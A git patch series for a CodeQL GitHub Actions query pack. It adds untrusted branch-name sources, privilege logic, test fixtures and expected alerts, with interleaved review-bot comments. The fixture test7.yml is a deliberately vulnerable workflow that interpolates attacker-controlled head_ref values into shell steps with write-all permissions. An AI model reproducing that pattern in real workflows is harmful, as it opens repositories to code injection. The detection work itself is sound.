diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/manual/ruby_setup-ruby.model.yml similarity index 100% rename from ql/lib/ext/ruby_setup-ruby.model.yml rename to ql/lib/ext/manual/ruby_setup-ruby.model.yml diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml similarity index 100% rename from ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml rename to ql/lib/ext/manual/salsify_action-detect-and-tag-new-version.model.yml diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/manual/sergeysova_jq-action.model.yml similarity index 100% rename from ql/lib/ext/sergeysova_jq-action.model.yml rename to ql/lib/ext/manual/sergeysova_jq-action.model.yml diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml similarity index 100% rename from ql/lib/ext/shallwefootball_upload-s3-action.model.yml rename to ql/lib/ext/manual/shallwefootball_upload-s3-action.model.yml diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml similarity index 100% rename from ql/lib/ext/shogo82148_actions-setup-perl.model.yml rename to ql/lib/ext/manual/shogo82148_actions-setup-perl.model.yml diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml similarity index 100% rename from ql/lib/ext/skitionek_notify-microsoft-teams.model.yml rename to ql/lib/ext/manual/skitionek_notify-microsoft-teams.model.yml diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/manual/snow-actions_eclint.model.yml similarity index 100% rename from ql/lib/ext/snow-actions_eclint.model.yml rename to ql/lib/ext/manual/snow-actions_eclint.model.yml 
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml similarity index 100% rename from ql/lib/ext/stackhawk_hawkscan-action.model.yml rename to ql/lib/ext/manual/stackhawk_hawkscan-action.model.yml diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/manual/step-security_harden-runner.model.yml similarity index 100% rename from ql/lib/ext/step-security_harden-runner.model.yml rename to ql/lib/ext/manual/step-security_harden-runner.model.yml diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml similarity index 100% rename from ql/lib/ext/suisei-cn_actions-download-file.model.yml rename to ql/lib/ext/manual/suisei-cn_actions-download-file.model.yml diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/manual/tibdex_backport.model.yml similarity index 100% rename from ql/lib/ext/tibdex_backport.model.yml rename to ql/lib/ext/manual/tibdex_backport.model.yml diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/manual/timheuer_base64-to-file.model.yml similarity index 100% rename from ql/lib/ext/timheuer_base64-to-file.model.yml rename to ql/lib/ext/manual/timheuer_base64-to-file.model.yml diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml similarity index 100% rename from ql/lib/ext/tj-actions_branch-names.model.yml rename to ql/lib/ext/manual/tj-actions_branch-names.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/manual/trilom_file-changes-action.model.yml similarity index 100% rename from ql/lib/ext/trilom_file-changes-action.model.yml rename to ql/lib/ext/manual/trilom_file-changes-action.model.yml 
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml similarity index 100% rename from ql/lib/ext/tripss_conventional-changelog-action.model.yml rename to ql/lib/ext/manual/tripss_conventional-changelog-action.model.yml diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml similarity index 100% rename from ql/lib/ext/tryghost_action-deploy-theme.model.yml rename to ql/lib/ext/manual/tryghost_action-deploy-theme.model.yml diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/manual/tzkhan_pr-update-action.model.yml similarity index 100% rename from ql/lib/ext/tzkhan_pr-update-action.model.yml rename to ql/lib/ext/manual/tzkhan_pr-update-action.model.yml diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/manual/veracode_veracode-sca.model.yml similarity index 100% rename from ql/lib/ext/veracode_veracode-sca.model.yml rename to ql/lib/ext/manual/veracode_veracode-sca.model.yml diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/manual/wearerequired_lint-action.model.yml similarity index 100% rename from ql/lib/ext/wearerequired_lint-action.model.yml rename to ql/lib/ext/manual/wearerequired_lint-action.model.yml diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/manual/webfactory_ssh-agent.model.yml similarity index 100% rename from ql/lib/ext/webfactory_ssh-agent.model.yml rename to ql/lib/ext/manual/webfactory_ssh-agent.model.yml diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/manual/xt0rted_slash-command-action.model.yml similarity index 100% rename from ql/lib/ext/xt0rted_slash-command-action.model.yml rename to ql/lib/ext/manual/xt0rted_slash-command-action.model.yml 
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/manual/zaproxy_action-baseline.model.yml
similarity index 100%
rename from ql/lib/ext/zaproxy_action-baseline.model.yml
rename to ql/lib/ext/manual/zaproxy_action-baseline.model.yml
diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
similarity index 100%
rename from ql/lib/ext/zaproxy_action-full-scan.model.yml
rename to ql/lib/ext/manual/zaproxy_action-full-scan.model.yml
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index abc56e6a0900..aece8aacc5f5 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -11,6 +11,6 @@ dependencies:
 extractor: javascript
 groups: javascript
 dataExtensions:
- - ext/*.model.yml
- - ext/**/*.model.yml
- - ext/workflow-models/workflow-models.yml
+ - ext/manual/*.model.yml
+ - ext/generated/**/*.model.yml
+ - ext/config/*.yml
diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql
index b3dc9185ec4c..a4d4eb43bb21 100644
--- a/ql/test/library-tests/workflowenum.ql
+++ b/ql/test/library-tests/workflowenum.ql
@@ -1,5 +1,5 @@
 import actions
-import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions
+import codeql.actions.config.ConfigExtensions as Extensions
 from string path, string trigger, string job, string secrets_source, string permissions,
From 61797e91807695bff916e24cfd078e1bb5a4c848 Mon Sep 17 00:00:00 2001
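Review bot: The new `ext/manual/*.model.yml` pattern is not recursive, whereas the removed `ext/**/*.model.yml` was, so a model file placed in a sub-directory of `ext/manual/` stops being loaded without any error; because these models define the sources and sinks the queries rely on, the failure mode is silent false negatives rather than a build break. The same applies to `ext/config/*.yml`, which replaces the explicit `ext/workflow-models/workflow-models.yml` entry, and this hunk does not show where that file now lives. A comment on the key, `# every model directory must be listed here; files that match no pattern are silently ignored`, would make the contract explicit, and the `sources` table in `ql/test/library-tests/test.expected` is the existing check that catches a model that silently dropped out, as long as it is kept complete.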
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 25 Jun 2024 13:27:08 +0200
Subject: [PATCH 347/707] Add pull_request-comment-branch head_ref as a source
---
 .../security/UntrustedCheckoutQuery.qll | 6 +++++-
 ...bell_pull-request-comment-branch.model.yml | 7 +++++++
 .../manual/eficode_resolve-pr-refs.model.yml | 8 ++++++++
 ...tson_pull-request-comment-branch.model.yml | 7 +++++++
 .../manual/tj-actions_branch-names.model.yml | 2 --
 ...rted_pull-request-comment-branch.model.yml | 7 +++++++
 ql/test/library-tests/test.expected | 5 ++++-
 .../CWE-094/.github/workflows/test7.yml | 20 +++++++++++++++++++
 .../CWE-094/CodeInjectionCritical.expected | 8 ++++++++
 .../CWE-094/CodeInjectionMedium.expected | 6 ++++++
 10 files changed, 72 insertions(+), 4 deletions(-)
 create mode 100644 ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
 create mode 100644 ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
 create mode 100644 ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
 create mode 100644 ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
 create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index a9c92e70ee5e..90b0a74d0ece 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -133,7 +133,11 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep {
 or
 // 3rd party actions returning the PR head sha/ref
 exists(UsesStep step |
- step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
+ step.getCallee() =
+ [
+ "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch",
+ "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch"
+ ] and
 this.getArgument("ref").regexpMatch(".*head_sha.*") and
 DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
 )
diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
new file mode 100644
index 000000000000..86ce17a9a9b5
--- /dev/null
+++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
+
diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
new file mode 100644
index 000000000000..8cdcabb2c117
--- /dev/null
+++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"]
+
+
diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
new file mode 100644
index 000000000000..f288c615a351
--- /dev/null
+++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
+
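Review bot: The widened callee list still keys the SHA checkout on `ref` arguments matching `.*head_sha.*`, while the model files added on the same lines register only `output.head_ref` of these four actions as a branch source; whether a checkout of `${{ steps.x.outputs.head_ref }}` from the two newly added actions is recognised therefore depends on a ref-based checkout class outside this hunk, which the commit does not touch, and the `test7.yml` fixture added here exercises only the code-injection sink, so the new callees get no checkout test at all. The same four callee strings are now spelled out both in this predicate and in the per-action model files, so the two lists can drift; a comment on the assignment, `// keep in sync with ext/manual/*pull-request-comment-branch.model.yml and eficode_resolve-pr-refs.model.yml`, would at least make the coupling visible. `ActionsSHACheckout` starts before this hunk and continues after it.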
diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml
index 91f3c056e6de..56f017635ce9 100644
--- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml
@@ -6,5 +6,3 @@ extensions:
 # https://github.com/tj-actions/branch-names
 - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"]
 - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"]
- - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"]
-
diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
new file mode 100644
index 000000000000..e4b34c37d70b
--- /dev/null
+++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: github/actions-all
+ extensible: actionsSourceModel
+ data:
+ - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
+
diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected
index 18f72de36d11..b09473fc1321 100644
--- a/ql/test/library-tests/test.expected
+++ b/ql/test/library-tests/test.expected
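Review bot: The removal of the `output.ref_branch` source row for tj-actions/branch-names is neither mentioned in the commit message nor explained in the model file, and dropping a source narrows what the queries report, so the reasoning (presumably that this output is not attacker-controlled on the triggers of interest) should be recorded where the next maintainer will look. A line next to the remaining rows, `# output.ref_branch deliberately not modelled as a source: <reason>`, would stop it from being re-added by someone completing the list from the action's README. The `test.expected` hunk on the following lines records the same removal.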
@@ -619,12 +619,15 @@ scopes
 sources
 | ahmadnassri/action-changed-files | * | output.files | filename | manual |
 | ahmadnassri/action-changed-files | * | output.json | json | manual |
+| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual |
 | amannn/action-semantic-pull-request | * | output.error_message | text | manual |
 | cypress-io/github-action | * | env.GH_BRANCH | branch | manual |
 | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual |
+| eficode/resolve-pr-refs | * | output.head_ref | branch | manual |
 | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual |
 | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual |
 | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual |
+| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual |
 | jitterbit/get-changed-files | * | output.added | filename | manual |
 | jitterbit/get-changed-files | * | output.added_modified | filename | manual |
 | jitterbit/get-changed-files | * | output.all | filename | manual |
@@ -639,12 +642,12 @@ sources
 | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual |
 | tj-actions/branch-names | * | output.current_branch | branch | manual |
 | tj-actions/branch-names | * | output.head_ref_branch | branch | manual |
-| tj-actions/branch-names | * | output.ref_branch | branch | manual |
 | trilom/file-changes-action | * | output.files | filename | manual |
 | trilom/file-changes-action | * | output.files_added | filename | manual |
 | trilom/file-changes-action | * | output.files_modified | filename | manual |
 | trilom/file-changes-action | * | output.files_removed | filename | manual |
 | tzkhan/pr-update-action | * | output.headMatch | branch | manual |
+| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual |
 | xt0rted/slash-command-action | * | output.command-arguments | text | manual |
 summaries
 | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual |
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml
new file mode 100644
index 000000000000..cae9358e8b7d
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml
@@ -0,0 +1,20 @@
+name: Test
+on: issue_comment
+permissions: write-all
+jobs:
+ test:
+ name: Test
+ runs-on: ubuntu-latest
+ steps:
+ - id: comment-branch
+ uses: xt0rted/pull-request-comment-branch@v2
+ with:
+ repo_token: ${{ github.token }}
+ - id: refs
+ uses: eficode/resolve-pr-refs@main
+ with:
+ token: ${{ github.token }}
+ - run: |
+ echo "HEAD_REF1 from PR: ${{ steps.comment-branch.outputs.head_ref }}"
+ - run: |
+ echo "HEAD_REF2 from PR: ${{ steps.refs.outputs.head_ref }}"
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index fdb5beb09aa0..f34915f45c21 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
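Review bot: The test7.yml fixture holds only positive cases — both `run` steps interpolate `head_ref` straight into the script — so the expected files pin the two new alerts but nothing guards against the new sources over-reporting; a third step that passes the same output through `env:` and reads it in the script as `"$HEAD_REF"` would pin that the safe form is not flagged. The workflow is also written with `permissions: write-all` on an `issue_comment` trigger, presumably to land in the critical severity expected file, so a top-of-file comment such as `# test fixture: intentionally unsafe workflow, do not copy` would keep it from being mistaken for a template. The eficode step is pinned to `@main` and the xt0rted step to a moving `@v2` tag, which is fine for a fixture that is never executed but worth a comment for the same reason.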
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -65,6 +65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -243,6 +245,10 @@ nodes | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -340,6 +346,8 @@ subpaths | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bd20179796e9..d919880e7264 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -65,6 +65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | 
@@ -243,6 +245,10 @@ nodes
 | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) |
 | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) |
 | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo |
+| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch |
+| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs |
+| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref |
+| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref |
 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] |
 | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 |
 | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] |

From 1fd7c148a5e771ae5041ea0e5d34f2c57e1df3e6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 25 Jun 2024 13:58:25 +0200
Subject: [PATCH 348/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index aece8aacc5f5..761554c60e6d 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.3
+version: 0.1.4
 dependencies:
 codeql/util: ^1.0.0
 codeql/yaml: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 74678b945ca5..9ccc911594f5 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.3
+version: 0.1.4
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript

From e6311966c80fae7fdf43db6ff43c88600933d08e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 26 Jun 2024 16:17:07 +0200
Subject: [PATCH 349/707] Take explicit permission into account for privilege calculation
---
 ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++++--
 .../CWE-349/.github/workflows/test20.yml | 46 +++++++++++++++++++
 .../CWE-829/.github/workflows/test4.yml | 46 +++++++++++++++++++
 .../UntrustedCheckoutCritical.expected | 1 -
 .../CWE-829/UntrustedCheckoutMedium.expected | 2 +
 5 files changed, 118 insertions(+), 5 deletions(-)
 create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml
 create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 8d965c3e4c71..2deb987650c8 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -848,11 +848,23 @@ class JobImpl extends AstNodeImpl, TJobNode {
 this.getPermissions().getAPermission().matches("%write")
 }

+ private predicate hasExplicitReadPermission() {
+ // the job has not an explicit write permission
+ exists(this.getPermissions().getAPermission()) and
+ not this.getPermissions().getAPermission().matches("%write")
+ }
+
 private predicate hasImplicitWritePermission() {
 // the job has an explicit write permission
 this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write")
 }

+ private predicate hasImplicitReadPermission() {
+ // the job has not an explicit write permission
+ exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and
+ not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write")
+ }
+
 private predicate hasRuntimeData() {
 exists(string path, string trigger, string name, string secrets_source, string perms |
 workflowDataModel(path, trigger, name, secrets_source, perms, _) and
@@ -892,8 +904,7 @@ class JobImpl extends AstNodeImpl, TJobNode {

 /** Holds if the action is privileged and externally triggerable. */
 predicate isPrivilegedExternallyTriggerable() {
- exists(EventImpl e |
- this.getATriggerEvent() = e and
+ exists(EventImpl e | this.getATriggerEvent() = e |
 // job is triggereable by an external user
 e.isExternallyTriggerable() and
 // no matter if `pull_request` is granted write permissions or access to secrets
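Review bot: The comment on the new hasImplicitReadPermission reads `// the job has not an explicit write permission`, but the predicate inspects the enclosing workflow's permissions, not the job's; it was copied from hasExplicitReadPermission and now describes the wrong scope. I would change it to `// the enclosing workflow declares permissions and none of them is a write permission` and tighten hasExplicitReadPermission's comment to `// the job declares permissions and none of them is a write permission`. Both predicates treat "at least one permission and none matching `%write`" as read-only, so a job with an empty `permissions: {}` block (GitHub's spelling for "no permissions at all") would, if getAPermission() yields nothing for it, satisfy neither and fall back to the normally-privileged default in isPrivilegedExternallyTriggerable, which looks like the opposite of what the commit intends. Whether the `write-all` / `read-all` shorthands end up matching `%write` depends on how getAPermission renders them, which is not visible here; JobImpl continues outside this hunk.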
@@ -903,9 +914,18 @@ class JobImpl extends AstNodeImpl, TJobNode {
 // job is privileged (write access or access to secrets)
 this.isPrivileged() or
- // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise
+ // the trigger event is __normally__ privileged
+ e.isPrivileged() and
+ // and we have no runtime data to prove otherwise
